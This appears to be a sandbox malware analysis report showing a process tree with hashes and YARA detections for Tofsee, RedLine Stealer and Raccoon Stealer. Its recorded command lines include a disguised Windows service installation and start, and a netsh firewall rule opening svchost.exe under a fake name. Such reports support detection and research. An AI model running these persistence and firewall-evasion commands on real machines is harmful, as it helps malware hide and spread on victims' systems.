                                                                                                                                                                                                        Analysis Process: sc.exe PID: 1716 Parent PID: 1368

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:31
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                        File size:60928 bytes
                                                                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 5416 Parent PID: 1716

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:32
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: sc.exe PID: 4728 Parent PID: 1368

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:32
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" start shayesoq
                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                        File size:60928 bytes
                                                                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 5236 Parent PID: 4728

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:33
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: lagavljy.exe PID: 4544 Parent PID: 568

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:33
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\shayesoq\lagavljy.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:10543104 bytes
                                                                                                                                                                                                        MD5 hash:7A36C0AD3083A1519CCE3A67BB377D18
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        Analysis Process: netsh.exe PID: 5988 Parent PID: 1368

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:33
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                        Imagebase:0x9f0000
                                                                                                                                                                                                        File size:82944 bytes
                                                                                                                                                                                                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 5560 Parent PID: 5988

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:34
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 5940 Parent PID: 4544

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:37
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:svchost.exe
                                                                                                                                                                                                        Imagebase:0xfc0000
                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        Analysis Process: 8EC4.exe PID: 6240 Parent PID: 6024

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:40
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8EC4.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\8EC4.exe
                                                                                                                                                                                                        Imagebase:0x610000
                                                                                                                                                                                                        File size:537088 bytes
                                                                                                                                                                                                        MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        Analysis Process: 7801.exe PID: 7032 Parent PID: 3424

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:51
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:905216 bytes
                                                                                                                                                                                                        MD5 hash:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                        Reset < >